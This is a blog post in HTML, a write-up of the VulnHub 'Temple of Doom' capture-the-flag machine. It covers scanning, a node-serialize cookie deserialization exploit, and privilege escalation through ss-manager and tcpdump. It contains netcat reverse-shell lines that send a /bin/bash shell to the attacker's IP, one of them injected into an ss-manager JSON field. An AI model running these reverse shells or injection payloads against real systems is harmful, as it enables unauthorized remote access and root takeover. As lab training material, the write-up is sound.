<!DOCTYPE html>
<html >
    
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">
<link rel="stylesheet" href="bootstrap.css">
<style>

body
{
margin:0%; padding:0%;
background: url("background.png");
}
   
.header
{
color: #6ed5a5;
font-size: 30px;
font-style:italic;
font-weight: bold;
text-align:center;
display: block;
margin-bottom:-23px;
}     
          
.logo
{
width:100px;
/*background: #E6E7E9; */    
margin-top: 98px;
border-radius:22px;
position:absolute;
margin-left: 46%;

}
@media only screen and (max-width: 600px) {
  .logo {
    margin-left:164px;
  }
}

.header-background
{
  background: #000000;
  display: block;
  border-radius: 50px;
  border:2px white;
  border-style: solid;
  margin-top: 10px;
  height: 73px;
}
     



.type_effect h1 {
  overflow: hidden; /* Ensures the content is not revealed until the animation */
  border-right: .15em solid orange; /* The typwriter cursor */
  white-space: nowrap; /* Keeps the content on a single line */
  margin: 0 auto; /* Gives that scrolling effect as the typing happens */
  letter-spacing: .02em; /* Adjust as needed */
  animation: typing 3.5s steps(40, end),
    blink-caret .75s step-end infinite;
}
.slide_writing {
  display: flex;
  justify-content: center;
  color: #6ed5a5;
}
.typewriter h1 {
  overflow: hidden; /* Ensures the content is not revealed until the animation */
  border-right: .30em solid orange; /* The typwriter cursor */
  white-space: nowrap; /* Keeps the content on a single line */
  font-size: 35px;
  letter-spacing: .02em; /* Adjust as needed */
  animation: 
    typing 2.5s steps(40, end),
    blink-caret .75s step-end infinite;
}
.article{
  width: 90%;
  height: 10%;
  box-shadow: 1px 2px 7px 3px white;
  margin-left: 5%;
  margin-top: 110px;
  border-radius: 22px;
  background: #131310;
}
.article-heading{
  font-family: "Times New Roman", Times, serif;
  color: white;
  margin-left: 10px;
  font-size: 40px;
}
.article-content
{
  font-family:sohne, "Times New Roman", Times, serif;
  color: white;
  margin-left: 5px;
  font-size: 28px;

}
.article-images{
width:68%;
margin:20px 0;
border-radius:13px;
vertical-align: middle;
margin-left: 50px;
}
@media only screen and (max-width: 600px) {
.article-images{
width:76%;
margin:20px 0;
border-radius:13px;
vertical-align: middle;
margin-left: 50px;
  }
/* The typing effect */
@keyframes typing {
  from { width: 0 }
  to { width: 100% }
}

/* The typewriter cursor effect */
@keyframes blink-caret {
  from, to { border-color: transparent }
  50% { border-color: #6ed5a5; }
}
@keyframes typing {
  from { width: 0 }
  to { width: 100% }
}

@keyframes blink-caret {
  from, to { border-color: transparent }
  50% { border-color: #6ed5a5; }
}
        </style>
      
      
      
    
    
    <body>
          <script src="jquery-3.3.1.min.js"></script>    
          <script src="bootstrap.min.js"></script>    

      <title>Temple Of Doom Write Up</title>

    <a href= https://x-o-mar.github.io/ > <img src="tic tac toe.png" class="logo" >  </a>

    <fieldset class="header-background">
      <div class="header" >X-o-Mar BLOG  </div>
     <div class=slide_writing>
     <div class="typewriter"><h1>Temple Of Doom</h1></div>
     </div>
    </fieldset>
    
    
<article class="article">
  <h1 class="article-heading">Vulnhub Temple Of Doom Writeup</h1>
  <p class="article-content">In this write up i am solving CTF challenge Temple of the doom. It was submitted on Vulnhub by 0katz.<br>
  	<br>
Difficulty: Easy/intermediate<br>
<br>
Link: https://www.vulnhub.com/<br>entry/temple-of-doom-1,243/<br>
<br>
Usually i am starting by scanning the ip of the machine but The ip was already exist so there was no need to scan upon it<br>
<img src="ip.png" class="article-images"><br>
So first i stated with scanning the open ports using nmap <br>
→nmap -sC -sV -p- 192.168.1.109 -oN nmap<br>
<img src="nmap.png" class="article-images"><br>
I checked the http website and there was nothing interesting
<img src="website.png" class="article-images"><br>
then i tried to get the directories using wfuzz but i got nothing<br>
<br>
→Wfuzz -c -z file,/usr/share/wordlists/<br>dirbuster-list-2.3-medium.txt — hc 404 http://192.168.1.109:666/FUZZ<br>
<br>
Also tried to check if there is any vulnerabilities using nikto but also got nothing <br>
<br>
→nikto -h http://192.168.1.109:666<br>
  
<img src="nikto.png" class="article-images"><br>

<br>
So i tried to run burbsuit to see what is going on on the background of the page<br>
<br>
I found there is base 64 encerapted cookies value<br>
<br>
And when i decoded it i got this<br>
<img src="cookies decoded.png" class="article-images"><br>
User and token and when it expires<br>
<br>
First i searched how to log in using an csrftoken but the result wasn’t that good<br>
<br>
So i tried to change in the value of the cookies<br>
First i sent each 2 togother to the server but i got an error each time
which was kind of useful cause it gave me the name of the node module (node-serialize)<br>
<img src="error-proof.png" class="article-images"><br>

Then i tried each one individually until i got a responce when i sent the username alone<br>
<img src="hello_admin.png" class="article-images"><br>

So i started to google if there is any vulnerabilities published for node-serialize

and i found one
<img src="google_search.png" class="article-images"><br>
<br>
<img src="payload.png" class="article-images"><br>

i customized it a little bit so i can get shell
and added it to the username parameter<br>
<br>
<img src="payload custimized.png" class="article-images"><br>
<br>Then i encoded it and sent it to the server so i got a shell …
<br>
<img src="nodeadmin_shell.png" class="article-images"><br>
<br> Now i am (nodeadmin) user<br>

<br>I tried sudo -l to see if there’s services i can run as sudo but there wasn’t and didn’t find any thing interesting in the home directory<br>
<br> So in order to enumerate more i changed directory to /tmp and got Linenum.sh using<br>

<br>→git clone https://github.com/rebootuser/<br>LinEnum.git
<br><img src="linenum_chmod.png" class="article-images"><br>

<br>After i changed LinEnum.sh to executable i ran it and found that the user fireman can run sudo commands
<br><img src="fireman.png" class="article-images"><br>
<br> So i ran the same script again and captured only the fireman user using grep to see if there is any service might be running by him and i found one called <br> ss-manager<br>

<br><img src="fireman_service.png" class="article-images"><br>
<br>
<br>I checked google for any available vulnerabilities and the first result was the answer<br>

<br><img src="ss-manager searcb.png" class="article-images"><br>

<br>By looking into the proof of concept i found that if i connect on localhost using netcat on the port 8839 it will be able to creat a file called evil in the tmp directory under the name of fireman user
<br><img src="proof of concept.png" class="article-images"><br>
<br>So first i checked if this port is open on the machine Using the command : netstat -anu<br>

it was there
<br><img src="netstat.png" class="article-images"><br>

<br>So i started listening on my machine and customized the payload in order to give me shell instead<br>
<br>
Listener:
<br>
→nc -u 127.0.0.1 8839<br>
<br>
Payload:<br>
→add: {“server_port”:8003, “password”:”test”, “method”:”||nc -nv 192.168.1.106 4444 -e /bin/bash||”}
<br>
<br><img src="fireman_access.png" class="article-images"><br>
now i am fireman user<br>
<br>So i tried sudo -l and found three services could be run as sudo
<br><img src="sudo -l.png" class="article-images"><br>

<br>I checked if i can escalate any of them to get root access and i found that it’s possible with tcpdump<br>
<br><img src="gtfobins.png" class="article-images"><br>

<br>

So the method will be adding a command in the command variable and it will be run as root in the end

<br>
<br>

I customized the command to give me root shell instead:

<br>
<br>
→COMMAND=’nc -nv 192.168.1.106 8888 -e /bin/bash’

<br>

<br>And i got root access...:)
<br><img src="root_access.png" class="article-images"><br>

</p>



</article>  
    </body>


